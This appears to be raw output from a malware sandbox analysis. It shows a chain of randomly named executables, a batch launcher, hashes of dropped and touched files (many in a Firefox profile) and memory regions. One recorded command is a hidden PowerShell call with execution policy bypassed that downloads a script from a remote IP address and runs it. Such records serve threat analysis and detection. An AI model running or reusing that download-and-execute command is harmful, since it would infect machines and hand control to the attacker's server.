C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe
"C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe"
C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\96B8.tmp\96B9.tmp\96BA.bat C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
Network
Files
| MD5 | 37259000abc86b85dbb65366443ec3c1 |
| SHA1 | b6cf0ac13b56918992c9c6daa38e791a40f60f88 |
| SHA256 | 681d6b115beeb234904a4235c87e9eecc6c25f09aab5cc20a36d58a5df35148c |
| SHA512 | 866e4e4d2af9aa8657fa84c1bfa552cbedcb151dd25d3dd7871ad6c27bba599e515515f4cbbf4610477867af8fb3a8f9090c5fcd28034ebb9db42f56eb900695 |
memory/1836-745-0x0000000000970000-0x0000000000DBE000-memory.dmp
memory/1836-747-0x0000000000970000-0x0000000000DBE000-memory.dmp
memory/1836-746-0x0000000000970000-0x0000000000DBE000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\prefs-1.js
| MD5 | 16bd85906df571b8e33d645944b2d502 |
| SHA1 | 28530458a4e683aa5ec838882a249d418eced553 |
| SHA256 | 97440130fde6dfa07ffc705ad1f91e8d1c5cc27d98a8e666c58fe9c40a9bd629 |
| SHA512 | 31a7e208b3a833ae28046e7d21ada604b5ffce4171c174539a7cee4ae5d2544b83c75f3a537fa5f0b2cb09cad4add1e9434907eb4c312c315313b26d1c715a4b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\AZ1RNKT0\soft[1]
| MD5 | f49d1aaae28b92052e997480c504aa3b |
| SHA1 | a422f6403847405cee6068f3394bb151d8591fb5 |
| SHA256 | 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0 |
| SHA512 | 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773 |
C:\Users\Admin\Desktop\YCL.lnk
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe
| MD5 | a9749ee52eefb0fd48a66527095354bb |
| SHA1 | 78170bcc54e1f774528dea3118b50ffc46064fe0 |
| SHA256 | b1663d4497ddd27a59f090b72adcedddac51724a1c126f7d6469f8045d065e15 |
| SHA512 | 9d21f0e1e376b89df717403a3939ed86ef61095bb9f0167ff15c01d3bbbee03d4dd01b3e2769ecd921e40e43bab3cbf0a6844ab6f296982227b0cb507b4b0e25 |
memory/4276-826-0x0000000000520000-0x00000000009DC000-memory.dmp
memory/1836-828-0x0000000000970000-0x0000000000DBE000-memory.dmp
memory/1836-835-0x0000000000970000-0x0000000000DBE000-memory.dmp
memory/4276-840-0x0000000000520000-0x00000000009DC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe
| MD5 | dab2bc3868e73dd0aab2a5b4853d9583 |
| SHA1 | 3dadfc676570fc26fc2406d948f7a6d4834a6e2c |
| SHA256 | 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb |
| SHA512 | 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8 |
memory/3820-858-0x00000000007B0000-0x0000000000E9E000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 5b76cbbb82694edd0c611cb130987872 |
| SHA1 | 449401ec72a2c40dfb35acade29fbfe417de8836 |
| SHA256 | fa7bc0dcf96d0524bf2bfceef05f5682f03a10d46c0396e1325b6617906772c3 |
| SHA512 | a3925cabb6ec4eddbd28e4b9a555eb3f917f7bb2a29b96456fcc26e4d1dde91f007972f39b2be501798207c87b045b5f94fb87eedde6fa78efd06edd78ac0e7c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\prefs-1.js
| MD5 | 7924cb8c38f57af46e40d74243debe63 |
| SHA1 | e3115390802c80932f72ad5ec5aa0004e7ea6acb |
| SHA256 | 814e996603ebcf8c3b75d8a9ac93e0fa19a129bbb02d0543e282d4f98d7e39f2 |
| SHA512 | a1989892402c56e08850f0e94aeb0e41ef9a8a550ff2b7746d005887c177793306bbc8ef895f3f948003e003d90d22adae51838dd6f73f60190880a6a674bc8a |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 09372174e83dbbf696ee732fd2e875bb |
| SHA1 | ba360186ba650a769f9303f48b7200fb5eaccee1 |
| SHA256 | c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f |
| SHA512 | b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
| MD5 | 2a461e9eb87fd1955cea740a3444ee7a |
| SHA1 | b10755914c713f5a4677494dbe8a686ed458c3c5 |
| SHA256 | 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc |
| SHA512 | 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
| MD5 | 842039753bf41fa5e11b3a1383061a87 |
| SHA1 | 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153 |
| SHA256 | d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c |
| SHA512 | d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\AlternateServices.bin
| MD5 | 489eac1766c04d398cefd0d26551a988 |
| SHA1 | 81f3add4214ab19bcca6cc66063682dedf2bf596 |
| SHA256 | c7f624ae5781b3a9d4cb566e3ec9504e3520aa5e77a3e1e5a925a2771fbf9ccd |
| SHA512 | 86d1db56219b650c91cf859865fb439bf83141e89dc74d5cfcaa36dc94f10f9e82d1622020689d44aff5a93c490dc55abbd6556d9f6aa092ff7354ac30a1bb81 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | 0a8747a2ac9ac08ae9508f36c6d75692 |
| SHA1 | b287a96fd6cc12433adb42193dfe06111c38eaf0 |
| SHA256 | 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03 |
| SHA512 | 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
| MD5 | bf957ad58b55f64219ab3f793e374316 |
| SHA1 | a11adc9d7f2c28e04d9b35e23b7616d0527118a1 |
| SHA256 | bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda |
| SHA512 | 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
| MD5 | daf7ef3acccab478aaa7d6dc1c60f865 |
| SHA1 | f8246162b97ce4a945feced27b6ea114366ff2ad |
| SHA256 | bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e |
| SHA512 | 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\prefs-1.js
| MD5 | e748e0c8994ad8b0da72973ed0291bd4 |
| SHA1 | 216606ad1fb1382c589163c31f2793b889f6685d |
| SHA256 | ac9897ceda6ef3dab4410e679086c20e6a744ce43a97fcd7d921ef8e93c7f14d |
| SHA512 | a2d4fff3f119db9dd63f4f19b62b489ed98f20c56567271347f78c802a827d6d58696aee7dce569f1d658383f8ac5b40df3bcd7ec1869193b08144085e639f2a |
C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe
| MD5 | f155a51c9042254e5e3d7734cd1c3ab0 |
| SHA1 | 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf |
| SHA256 | 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af |
| SHA512 | 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a |
memory/2020-979-0x00000000003D0000-0x0000000000871000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-widevinecdm\4.10.2710.0\LICENSE.txt.tmp
| MD5 | 49ddb419d96dceb9069018535fb2e2fc |
| SHA1 | 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6 |
| SHA256 | 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539 |
| SHA512 | 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2 |
memory/4276-1000-0x0000000000520000-0x00000000009DC000-memory.dmp
memory/3820-1001-0x00000000007B0000-0x0000000000E9E000-memory.dmp
C:\ProgramData\CC69A22766873E3E.dat
| MD5 | a182561a527f929489bf4b8f74f65cd7 |
| SHA1 | 8cd6866594759711ea1836e86a5b7ca64ee8911f |
| SHA256 | 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914 |
| SHA512 | 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\cert9.db
| MD5 | f7c6e562ad967ed884393886a94e363f |
| SHA1 | 4014007970d8138267462fd8ee069e1b3aebdbaa |
| SHA256 | 859d0087d4fdcee697c65a7885be015707bf5f20f00969cc865f805f9defc674 |
| SHA512 | 6dc896fe7144910ca8d9b212a35e6690d920d85a89400c0d77dc2b9f9d6afbaaeaf7310c06d778aeac41cf351b7eaf1b4c96151469aed6b73825681e7f85eb22 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\prefs.js
| MD5 | 95272a816555295eb83ffb964ec1f8f5 |
| SHA1 | 1dbbe86abf4894260c9fd88ed04edbdd94c9fa61 |
| SHA256 | e627c2bc12577e1e0ffb6843bf7a865b8e143dd13d3d1a8b90b41da474e90588 |
| SHA512 | b36a6dce8999b5c7e67750299b964e2e6d6c8af3326d203244933ecf1fc28b78b0e6de7adae0e82275ad4f6d334522c17046dda7a24fc976860dd0a07cf9a7c9 |
C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe
| MD5 | b60779fb424958088a559fdfd6f535c2 |
| SHA1 | bcea427b20d2f55c6372772668c1d6818c7328c9 |
| SHA256 | 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221 |
| SHA512 | c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f |
memory/6120-1051-0x0000000000F40000-0x0000000000FA0000-memory.dmp
memory/2504-1055-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2504-1053-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2020-1057-0x00000000003D0000-0x0000000000871000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe
| MD5 | d39df45e0030e02f7e5035386244a523 |
| SHA1 | 9ae72545a0b6004cdab34f56031dc1c8aa146cc9 |
| SHA256 | df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2 |
| SHA512 | 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64 |
memory/2104-1075-0x000001F80FF10000-0x000001F80FF22000-memory.dmp
memory/2104-1076-0x000001F8102B0000-0x000001F8102C0000-memory.dmp
memory/4276-1079-0x0000000000520000-0x00000000009DC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe
| MD5 | 641525fe17d5e9d483988eff400ad129 |
| SHA1 | 8104fa08cfcc9066df3d16bfa1ebe119668c9097 |
| SHA256 | 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a |
| SHA512 | ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e |
memory/4484-1098-0x0000000000340000-0x00000000003B0000-memory.dmp
memory/4556-1100-0x0000000000520000-0x00000000009DC000-memory.dmp
memory/628-1105-0x0000000000400000-0x0000000000466000-memory.dmp
memory/628-1103-0x0000000000400000-0x0000000000466000-memory.dmp
memory/628-1107-0x0000000000400000-0x0000000000466000-memory.dmp
memory/628-1109-0x0000000003860000-0x0000000003865000-memory.dmp
memory/628-1108-0x0000000003860000-0x0000000003865000-memory.dmp
memory/4276-1113-0x0000000000520000-0x00000000009DC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe
| MD5 | 6006ae409307acc35ca6d0926b0f8685 |
| SHA1 | abd6c5a44730270ae9f2fce698c0f5d2594eac2f |
| SHA256 | a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b |
| SHA512 | b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718 |
memory/4488-1127-0x0000000000BC0000-0x000000000105B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe
| MD5 | 5b3ed060facb9d57d8d0539084686870 |
| SHA1 | 9cae8c44e44605d02902c29519ea4700b4906c76 |
| SHA256 | 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207 |
| SHA512 | 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a |
memory/4488-1147-0x0000000000BC0000-0x000000000105B000-memory.dmp
memory/2676-1153-0x0000015279F40000-0x0000015279F62000-memory.dmp